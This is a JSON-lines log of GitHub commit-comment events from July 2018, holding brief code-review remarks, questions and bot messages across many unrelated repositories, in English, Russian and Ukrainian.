{"id":"7906218044","type":"CommitCommentEvent","actor":{"login":"Lucidem"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29565358,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T11:59:46Z","updated_at":"2018-07-02T11:59:46Z","author_association":"NONE","body":"He's not wrong.  Needn't be so defensive pawpal.  Nice script 👌"}},"created_at":"2018-07-02T11:59:46Z"}
{"id":"7906218221","type":"CommitCommentEvent","actor":{"login":"aniket121"},"repo":{"name":"akeating/peap"},"payload":{"comment":{"id":29565359,"position":null,"line":null,"path":null,"commit_id":"647bc9a7959e3bae0e4a41793779d110cb0f9a11","created_at":"2018-07-02T11:59:48Z","updated_at":"2018-07-02T11:59:48Z","author_association":"NONE","body":"thanks for help"}},"created_at":"2018-07-02T11:59:48Z"}
{"id":"7906225242","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29565375,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-02T12:01:15Z","updated_at":"2018-07-02T12:01:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T12:01:15Z"}
{"id":"7906230924","type":"CommitCommentEvent","actor":{"login":"shubhambadkur12"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29565378,"position":20,"line":111,"path":"app/Http/Controllers/PincodeController.php","commit_id":"7364aa1695da8239353885cd20939f2e0007f973","created_at":"2018-07-02T12:02:20Z","updated_at":"2018-07-02T12:02:20Z","author_association":"NONE","body":"Add a extra line in the end of the file"}},"created_at":"2018-07-02T12:02:20Z"}
{"id":"7906231536","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29565381,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T12:02:29Z","updated_at":"2018-07-02T12:02:29Z","author_association":"NONE","body":"> but after system start up it is lost.\r\n\r\nHuh. Is correct DTB loaded? Wireless and network is working, right?"}},"created_at":"2018-07-02T12:02:29Z"}
{"id":"7906232803","type":"CommitCommentEvent","actor":{"login":"denis19973"},"repo":{"name":"oleshonchar/instabot"},"payload":{"comment":{"id":29565384,"position":45,"line":45,"path":"instagram_bot/bot.py","commit_id":"ea69aa3bfdf72d38de88f1f2418e83a8ed958903","created_at":"2018-07-02T12:02:45Z","updated_at":"2018-07-02T12:02:45Z","author_association":"NONE","body":"`        \r\n            if not user_id_list:\r\n                    logger.info('Ошибка: страница недоступна')\r\n                    return False\r\n            for user_id in user_id_list:\r\n                user_feed = self.api.getUserFeed(user_id)\r\n                if not user_feed:\r\n                    logger.info('Ошибка: пользователь не найден или доступ закрыт')\r\n                    return False\r\n                pictures = self.api.LastJson['items']\r\n                for picture in pictures:\r\n                    photo_list.append(int(picture['pk']))\r\n                time.sleep(5)\r\n            if photo_list:\r\n                    return photo_list\r\n            else:\r\n                  logger.info('Ошибка: нет доступных фото')\r\n`"}},"created_at":"2018-07-02T12:02:45Z"}
{"id":"7906235181","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565395,"position":23,"line":23,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T12:03:14Z","updated_at":"2018-07-02T12:03:14Z","author_association":"OWNER","body":"There are some caveats to the solution you came up with. First, it doesn't currently correctly solve the challenge as it is mentioned at the beginning of the file: `# Problem: Try to cap elements in the list.`\r\n\r\n\r\nAdd this to your code to verify what I mean:\r\n```\r\nprint(type(capped_hiking))\r\n```\r\n\r\nWhat is an easy way to resolve this issue?"}},"created_at":"2018-07-02T12:03:14Z"}
{"id":"7906236240","type":"CommitCommentEvent","actor":{"login":"lordofhyphens"},"repo":{"name":"lordofhyphens/Slic3r"},"payload":{"comment":{"id":29565396,"position":null,"line":null,"path":null,"commit_id":"00183cacc644d3aacf80e2ea33a00b4435a8c5af","created_at":"2018-07-02T12:03:27Z","updated_at":"2018-07-02T12:03:27Z","author_association":"OWNER","body":"No idea. I haven't looked at anything that the Prusa3d folks have been doing lately.\r\n\r\nThis change does break existing configurations."}},"created_at":"2018-07-02T12:03:27Z"}
{"id":"7906238842","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29565399,"position":null,"line":null,"path":null,"commit_id":"c421a92205f159f07076446778d0b652ac6de448","created_at":"2018-07-02T12:04:01Z","updated_at":"2018-07-02T12:04:01Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/brokenlinksfix. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-02T12:04:01Z"}
{"id":"7906239208","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565400,"position":4,"line":4,"path":"server/handlers/api/v1/auth/controllers/sign-in.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:04:07Z","updated_at":"2018-07-02T12:04:07Z","author_association":"OWNER","body":"да, этому есть небольшая предыстория:\r\nмы во всех клиентских приложениях используем ts. посему когда аргументы записываешь через вложенную деструктиризация ts ругается на unused переменные и не компилирует проект)\r\n\r\nпосему как-то по привычке в нодовском коде тоже деструктуризацию не использую. хотя в этом кейсе можно было её использовать уже в теле, а не в аргументе)\r\n"}},"created_at":"2018-07-02T12:04:07Z"}
{"id":"7906243841","type":"CommitCommentEvent","actor":{"login":"odenbach"},"repo":{"name":"lausser/check_ups_health"},"payload":{"comment":{"id":29565411,"position":18,"line":32,"path":"plugins-scripts/Classes/XUPS/Components/EnvironmentalSubsystem.pm","commit_id":"23060780acec69e5e963168a540fed02069715a6","created_at":"2018-07-02T12:05:04Z","updated_at":"2018-07-02T12:05:04Z","author_association":"NONE","body":"This will fail at 0 degrees, that is why I used \"defined\" instead."}},"created_at":"2018-07-02T12:05:04Z"}
{"id":"7906244421","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565413,"position":23,"line":23,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T12:05:12Z","updated_at":"2018-07-02T12:05:12Z","author_association":"OWNER","body":"Which other issue comes up after resolving the previous one?\r\n\r\nHint: everyone starting from the the ` Old Lady` seems a little... _removed_:\r\n\r\n```\r\nDevil's Den\r\n Old Lady\r\n```\r\n\r\nHow can you fix this?"}},"created_at":"2018-07-02T12:05:12Z"}
{"id":"7906244631","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565414,"position":10,"line":10,"path":"server/handlers/api/v1/auth/credentials.js","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:05:14Z","updated_at":"2018-07-02T12:05:14Z","author_association":"OWNER","body":"да, точняк)"}},"created_at":"2018-07-02T12:05:14Z"}
{"id":"7906247728","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29565418,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T12:05:49Z","updated_at":"2018-07-02T12:05:49Z","author_association":"OWNER","body":"Yes, both are working, but somehow the SD-Card is lost. (probe error -524 ???).\n\nCurrently I`m working here at the DTS, but as long as I do not really understand the error, I can make no promises.\n\nOverall it is still in a „quite okay“ state and the now working reboot is a good progress.\n\n\n> Am 02.07.2018 um 14:02 schrieb Igor Pečovnik <notifications@github.com>:\n> \n> but after system start up it is lost.\n> \n> Huh. Is correct DTB loaded? Wireless and network is working, right?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/Staars/build/commit/332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d#commitcomment-29565381>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFOiZNtzafcX6kh7IvI9uGjVperP_L94ks5uCgvVgaJpZM4U-1-E>.\n> \n\n"}},"created_at":"2018-07-02T12:05:49Z"}
{"id":"7906249148","type":"CommitCommentEvent","actor":{"login":"Juzerhk"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29565421,"position":10,"line":10,"path":"chatbot/src/main/java/chatbot/ChatbotApplication.java","commit_id":"b6d7bd858c355395203561d04fa0be430284373d","created_at":"2018-07-02T12:06:06Z","updated_at":"2018-07-02T12:06:06Z","author_association":"COLLABORATOR","body":"@EnableDiscoveryClient will be used when Eureka Server is not on the build path. I guess there wont be any conflicts because of this"}},"created_at":"2018-07-02T12:06:06Z"}
{"id":"7906249920","type":"CommitCommentEvent","actor":{"login":"seanh"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":29565422,"position":null,"line":null,"path":null,"commit_id":"889d7d6606d76765f23bf1bd43b0b57b084da878","created_at":"2018-07-02T12:06:15Z","updated_at":"2018-07-02T12:06:15Z","author_association":"CONTRIBUTOR","body":"Good catch"}},"created_at":"2018-07-02T12:06:15Z"}
{"id":"7906251004","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29565423,"position":21,"line":78,"path":"core/descriptors/src/org/jetbrains/kotlin/descriptors/impl/EnumEntrySyntheticClassDescriptor.java","commit_id":"5b0519c641f46a6eafae4c0fd5abb32aeed850b2","created_at":"2018-07-02T12:06:29Z","updated_at":"2018-07-02T12:06:29Z","author_association":"MEMBER","body":"TBH, I did't get why is this change not enough and we add another check in the serializer"}},"created_at":"2018-07-02T12:06:29Z"}
{"id":"7906251481","type":"CommitCommentEvent","actor":{"login":"lubuzzo"},"repo":{"name":"chaincoin/chaincoin"},"payload":{"comment":{"id":29565426,"position":368,"line":369,"path":"doc/release-notes.md","commit_id":"8596e98ae393defbb762d0061eabcb03030d55e5","created_at":"2018-07-02T12:06:34Z","updated_at":"2018-07-02T12:06:34Z","author_association":"MEMBER","body":"The InstantSend wasn't removed?"}},"created_at":"2018-07-02T12:06:34Z"}
{"id":"7906253790","type":"CommitCommentEvent","actor":{"login":"odenbach"},"repo":{"name":"lausser/check_ups_health"},"payload":{"comment":{"id":29565432,"position":21,"line":35,"path":"plugins-scripts/Classes/XUPS/Components/EnvironmentalSubsystem.pm","commit_id":"23060780acec69e5e963168a540fed02069715a6","created_at":"2018-07-02T12:07:07Z","updated_at":"2018-07-02T12:07:07Z","author_association":"NONE","body":"I do not know whether all UPSes which implement xupsEnvAmbientTemp also implement both limits."}},"created_at":"2018-07-02T12:07:07Z"}
{"id":"7906256782","type":"CommitCommentEvent","actor":{"login":"camryh"},"repo":{"name":"camryh/openpilot"},"payload":{"comment":{"id":29565447,"position":null,"line":null,"path":null,"commit_id":"92bbbd80275e64bbbae102e329959da70465ed74","created_at":"2018-07-02T12:07:46Z","updated_at":"2018-07-02T12:07:46Z","author_association":"OWNER","body":"Show car positions based on vision when defaulting to mock car (fingerprint not recognized)"}},"created_at":"2018-07-02T12:07:46Z"}
{"id":"7906256884","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29565448,"position":null,"line":null,"path":null,"commit_id":"8fb0d6da7b81992443aafc114acda9ab5e50dde4","created_at":"2018-07-02T12:07:47Z","updated_at":"2018-07-02T12:07:47Z","author_association":"CONTRIBUTOR","body":"I don't know, I will dig more ..."}},"created_at":"2018-07-02T12:07:47Z"}
{"id":"7906257883","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"bhrrc/modernslaveryregistry.org"},"payload":{"comment":{"id":29565450,"position":null,"line":null,"path":null,"commit_id":"da803d86101bcbe6612f2c89ffd5cde484826ed9","created_at":"2018-07-02T12:08:01Z","updated_at":"2018-07-02T12:08:01Z","author_association":"CONTRIBUTOR","body":"Hi @chrislo. Patricia was adding some California statements yesterday, and all of a sudden the webapp started 500'ing. I think she had added a statement without year/month, but I'm not 100% sure. I found the error in [Rollbar](https://rollbar.com/msa-registry/msa-registry/items/80/), then reproduced it:\r\n\r\nI opened a `heroku console`, ran `StatementStats.new.total_statements_over_time` and saw the same error raised from this line:\r\n\r\nhttps://github.com/bhrrc/modernslaveryregistry.org/blob/1af2410294f7c9354bb8b9ac5046ad5cf239e75e/app/models/statement_stats.rb#L30\r\n\r\nAfter I added the workaround, the site came back, and Patricia probably updated the data.\r\n\r\nI didn't try to reproduce or analyse how the database got into the state it was in."}},"created_at":"2018-07-02T12:08:01Z"}
{"id":"7906258135","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565451,"position":24,"line":24,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T12:08:04Z","updated_at":"2018-07-02T12:08:04Z","author_association":"OWNER","body":"After fixing the above mentioned issues, go back to the beginning of the code and add another trail to our list:\r\n`\"casey's swimlane\"`.\r\n\r\nRun your code - what happens and why?\r\n\r\nDescribe why it is important to:\r\n- generalize the problem as much as possible\r\n- run **tests** to figure out if your code works as expected."}},"created_at":"2018-07-02T12:08:04Z"}
{"id":"7906259801","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29565464,"position":68,"line":103,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T12:08:27Z","updated_at":"2018-07-02T12:08:27Z","author_association":"NONE","body":"You pad it to PoT ?"}},"created_at":"2018-07-02T12:08:27Z"}
{"id":"7906260193","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29565466,"position":52,"line":158,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"604151ca14ca80e3ca97eb954b258d611f9f6955","created_at":"2018-07-02T12:08:32Z","updated_at":"2018-07-02T12:08:32Z","author_association":"OWNER","body":"fill with nulls? "}},"created_at":"2018-07-02T12:08:32Z"}
{"id":"7906261369","type":"CommitCommentEvent","actor":{"login":"Sudarshansfdc"},"repo":{"name":"Sudarshansfdc/SFDC2018"},"payload":{"comment":{"id":29565468,"position":null,"line":null,"path":null,"commit_id":"e5f94e38e4d4690cd3fe18c5b7e200a2bfd4d050","created_at":"2018-07-02T12:08:47Z","updated_at":"2018-07-02T12:08:47Z","author_association":"OWNER","body":"dfsg"}},"created_at":"2018-07-02T12:08:47Z"}
{"id":"7906263183","type":"CommitCommentEvent","actor":{"login":"amarc78"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29565473,"position":null,"line":null,"path":null,"commit_id":"d945eec71875e549e1d0f8fb9208cb01b1ed723e","created_at":"2018-07-02T12:09:14Z","updated_at":"2018-07-02T12:09:14Z","author_association":"CONTRIBUTOR","body":"Everything works great now. Make it public. Thanks again!"}},"created_at":"2018-07-02T12:09:14Z"}
{"id":"7906264882","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565481,"position":10,"line":10,"path":"src/App.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:09:35Z","updated_at":"2018-07-02T12:09:35Z","author_association":"OWNER","body":"при создании инстанса роута где-то задаётся, верно?"}},"created_at":"2018-07-02T12:09:35Z"}
{"id":"7906265551","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29565484,"position":57,"line":94,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T12:09:44Z","updated_at":"2018-07-02T12:09:44Z","author_association":"NONE","body":"`.length()` is not free, try to replace with a constant `#define`"}},"created_at":"2018-07-02T12:09:44Z"}
{"id":"7906267364","type":"CommitCommentEvent","actor":{"login":"calestyo"},"repo":{"name":"dCache/dcache"},"payload":{"comment":{"id":29565489,"position":null,"line":null,"path":null,"commit_id":"ee8f1148ce7597c7687a35f766652bb2470fd908","created_at":"2018-07-02T12:10:09Z","updated_at":"2018-07-02T12:10:09Z","author_association":"CONTRIBUTOR","body":"Does \"Require-notes: yes\" even has any effect?\r\n\r\nThis changes a default value (which people may have explicitly wanted as is) and thus should *always* be documented... moreover, people which had it manually set to the \"new\" default value before, might wish to clean up their configs and not explicitly set the default again.\r\n\r\n..."}},"created_at":"2018-07-02T12:10:09Z"}
{"id":"7906268136","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29565490,"position":139,"line":228,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"604151ca14ca80e3ca97eb954b258d611f9f6955","created_at":"2018-07-02T12:10:18Z","updated_at":"2018-07-02T12:10:18Z","author_association":"OWNER","body":"check that"}},"created_at":"2018-07-02T12:10:18Z"}
{"id":"7906268762","type":"CommitCommentEvent","actor":{"login":"maheshjoshiitc"},"repo":{"name":"maheshjoshiitc/FlipWeb"},"payload":{"comment":{"id":29565493,"position":null,"line":null,"path":null,"commit_id":"03d456c01ae1a169338ee4589e4d55ce8d9aefb2","created_at":"2018-07-02T12:10:26Z","updated_at":"2018-07-02T12:10:26Z","author_association":"OWNER","body":"UI Changes"}},"created_at":"2018-07-02T12:10:26Z"}
{"id":"7906268997","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29565494,"position":151,"line":240,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"604151ca14ca80e3ca97eb954b258d611f9f6955","created_at":"2018-07-02T12:10:29Z","updated_at":"2018-07-02T12:10:29Z","author_association":"OWNER","body":"check that"}},"created_at":"2018-07-02T12:10:29Z"}
{"id":"7906271319","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565498,"position":10,"line":10,"path":"src/components/NotAuth.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:10:59Z","updated_at":"2018-07-02T12:10:59Z","author_association":"OWNER","body":"верно, в данном случае просто не менял, т.к. к ссылкам могут быть привязаны стили от materialize. если бы делал что-то кастомное, то тоже сделал бы через button"}},"created_at":"2018-07-02T12:10:59Z"}
{"id":"7906271476","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29565501,"position":null,"line":null,"path":null,"commit_id":"b13879e619333525026d48364610456e10b1d67f","created_at":"2018-07-02T12:11:01Z","updated_at":"2018-07-02T12:11:01Z","author_association":"COLLABORATOR","body":"What software did you use to push things into the master branch?"}},"created_at":"2018-07-02T12:11:01Z"}
{"id":"7906273725","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565514,"position":3,"line":3,"path":"src/components/SignInForm.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:11:31Z","updated_at":"2018-07-02T12:11:31Z","author_association":"OWNER","body":"согласен полностью, верное замечание"}},"created_at":"2018-07-02T12:11:31Z"}
{"id":"7906274466","type":"CommitCommentEvent","actor":{"login":"denis19973"},"repo":{"name":"oleshonchar/instabot"},"payload":{"comment":{"id":29565517,"position":93,"line":93,"path":"instagram_bot/bot.py","commit_id":"ea69aa3bfdf72d38de88f1f2418e83a8ed958903","created_at":"2018-07-02T12:11:40Z","updated_at":"2018-07-02T12:11:40Z","author_association":"NONE","body":"profile, created і перевіряти created"}},"created_at":"2018-07-02T12:11:40Z"}
{"id":"7906275613","type":"CommitCommentEvent","actor":{"login":"jangorecki"},"repo":{"name":"Rdatatable/data.table"},"payload":{"comment":{"id":29565523,"position":161,"line":75,"path":"src/froll.c","commit_id":"5f7bb27410b69612d5af24ba08d860bcfc8f174d","created_at":"2018-07-02T12:11:55Z","updated_at":"2018-07-02T12:11:55Z","author_association":"MEMBER","body":"@mattdowle is there any risk of race condition when `memcpy` copy same vector to self but shifted? I tested extensively in a loop and results were always as expected. Asking about race condition within single thread, each `ans` is used only by single thread only."}},"created_at":"2018-07-02T12:11:55Z"}
{"id":"7906277381","type":"CommitCommentEvent","actor":{"login":"atakancosar"},"repo":{"name":"mvasilchuk/webproxy"},"payload":{"comment":{"id":29565532,"position":null,"line":null,"path":null,"commit_id":"abf560ba36c93aa7b19f2025350574eb9d402974","created_at":"2018-07-02T12:12:18Z","updated_at":"2018-07-02T12:12:18Z","author_association":"NONE","body":"Hello Mr.Mvasilchuk, I want to contact with you about stb emulator? Can you contact me by email or facebook? Thanks"}},"created_at":"2018-07-02T12:12:18Z"}
{"id":"7906279516","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565538,"position":6,"line":6,"path":"src/services/check-auth.ts","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:12:44Z","updated_at":"2018-07-02T12:12:44Z","author_association":"OWNER","body":"верное замечание"}},"created_at":"2018-07-02T12:12:44Z"}
{"id":"7906281109","type":"CommitCommentEvent","actor":{"login":"denis19973"},"repo":{"name":"oleshonchar/instabot"},"payload":{"comment":{"id":29565544,"position":22,"line":22,"path":"telegram_bot/bot.py","commit_id":"ea69aa3bfdf72d38de88f1f2418e83a8ed958903","created_at":"2018-07-02T12:13:05Z","updated_at":"2018-07-02T12:13:05Z","author_association":"NONE","body":"if not username_list:\r\n    send_messsage('photos are without likes')"}},"created_at":"2018-07-02T12:13:05Z"}
{"id":"7906281294","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565545,"position":29,"line":29,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T12:13:08Z","updated_at":"2018-07-02T12:13:08Z","author_association":"OWNER","body":"### Challenge\r\n\r\nCollect the titlecased trails in a new list instead of printing them out."}},"created_at":"2018-07-02T12:13:08Z"}
{"id":"7906283697","type":"CommitCommentEvent","actor":{"login":"selkinvitaly"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565551,"position":9,"line":9,"path":"src/utils/auth.ts","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:13:37Z","updated_at":"2018-07-02T12:13:37Z","author_association":"OWNER","body":"про сафари в курсе, за ссылку спасибо - почитанию"}},"created_at":"2018-07-02T12:13:37Z"}
{"id":"7906284018","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565553,"position":1,"line":19,"path":"agent/core/src/main/java/com/axway/ats/agent/core/exceptions/InternalComponentException.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:13:41Z","updated_at":"2018-07-02T12:13:41Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:13:41Z"}
{"id":"7906284926","type":"CommitCommentEvent","actor":{"login":"berlincount"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29565555,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T12:13:52Z","updated_at":"2018-07-02T12:13:52Z","author_association":"CONTRIBUTOR","body":"I'm not sure. Reverting it gets me a forecast shown again :-/"}},"created_at":"2018-07-02T12:13:52Z"}
{"id":"7906287568","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565563,"position":4,"line":33,"path":"agent/core/src/main/java/com/axway/ats/agent/core/monitoring/UserActivityLoggingUtils.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:14:26Z","updated_at":"2018-07-02T12:14:26Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:14:26Z"}
{"id":"7906287872","type":"CommitCommentEvent","actor":{"login":"Deathw15h"},"repo":{"name":"Deathw15h/Deathw15h.github.io"},"payload":{"comment":{"id":29565564,"position":43,"line":43,"path":"css/main.css","commit_id":"41097e591224b7ec5a9247ddd9b47fb626757173","created_at":"2018-07-02T12:14:30Z","updated_at":"2018-07-02T12:14:30Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-02T12:14:30Z"}
{"id":"7906288409","type":"CommitCommentEvent","actor":{"login":"yiqi8088"},"repo":{"name":"yiqi8088/lh118"},"payload":{"comment":{"id":29565566,"position":null,"line":null,"path":null,"commit_id":"671e938ac1375ff4f4b45cc55f1fc2eb4f6a302a","created_at":"2018-07-02T12:14:37Z","updated_at":"2018-07-02T12:14:37Z","author_association":"OWNER","body":"hello Git"}},"created_at":"2018-07-02T12:14:37Z"}
{"id":"7906288908","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29565568,"position":21,"line":78,"path":"core/descriptors/src/org/jetbrains/kotlin/descriptors/impl/EnumEntrySyntheticClassDescriptor.java","commit_id":"5b0519c641f46a6eafae4c0fd5abb32aeed850b2","created_at":"2018-07-02T12:14:44Z","updated_at":"2018-07-02T12:14:44Z","author_association":"MEMBER","body":"So that serialized protos of enum entry classes which are resolved in sources (LazyClassDescriptor) and are deserialized from binaries (EnumEntrySyntheticClassDescriptor) are the same. There are tests on incremental compilation in JS that check that the serialized proto is exactly the same after rebuild and after an incremental build.\r\n\r\n// I'll add this info to the commit message"}},"created_at":"2018-07-02T12:14:44Z"}
{"id":"7906289592","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565574,"position":4,"line":46,"path":"agent/core/src/main/java/com/axway/ats/agent/core/monitoring/agents/AtsSystemMonitoringAgent.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:14:53Z","updated_at":"2018-07-02T12:14:53Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:14:53Z"}
{"id":"7906290137","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Silverlight1989/YII2"},"payload":{"comment":{"id":29565576,"position":18,"line":18,"path":"commands/hello_controller.php","commit_id":"84b07f34e6b04b92a128dbf0d7c6de78f8190c32","created_at":"2018-07-02T12:15:00Z","updated_at":"2018-07-02T12:15:00Z","author_association":"CONTRIBUTOR","body":"Файл должен быть  назван, так же как и класс в CamelCase"}},"created_at":"2018-07-02T12:15:00Z"}
{"id":"7906290739","type":"CommitCommentEvent","actor":{"login":"Surendrajat"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29565579,"position":null,"line":null,"path":null,"commit_id":"d945eec71875e549e1d0f8fb9208cb01b1ed723e","created_at":"2018-07-02T12:15:08Z","updated_at":"2018-07-02T12:15:08Z","author_association":"MEMBER","body":"It already is public! :wink:"}},"created_at":"2018-07-02T12:15:08Z"}
{"id":"7906292601","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Silverlight1989/YII2"},"payload":{"comment":{"id":29565588,"position":22,"line":8,"path":"config/db.php","commit_id":"84b07f34e6b04b92a128dbf0d7c6de78f8190c32","created_at":"2018-07-02T12:15:31Z","updated_at":"2018-07-02T12:15:31Z","author_association":"CONTRIBUTOR","body":"Закомментированный код лучше удалять - он всегда доступен в истории гита"}},"created_at":"2018-07-02T12:15:31Z"}
{"id":"7906294216","type":"CommitCommentEvent","actor":{"login":"vietj"},"repo":{"name":"vert-x3/vertx-proton"},"payload":{"comment":{"id":29565592,"position":8,"line":331,"path":"src/main/java/io/vertx/proton/ProtonLink.java","commit_id":"35eeb59f82bf8f95d7e7a6b1b0d8a296ede09f2a","created_at":"2018-07-02T12:15:51Z","updated_at":"2018-07-02T12:15:51Z","author_association":"CONTRIBUTOR","body":"that's a good point, in some project we do have `*Internal` interfaces that expose such methods, perhaps we should consider doing it for proton."}},"created_at":"2018-07-02T12:15:51Z"}
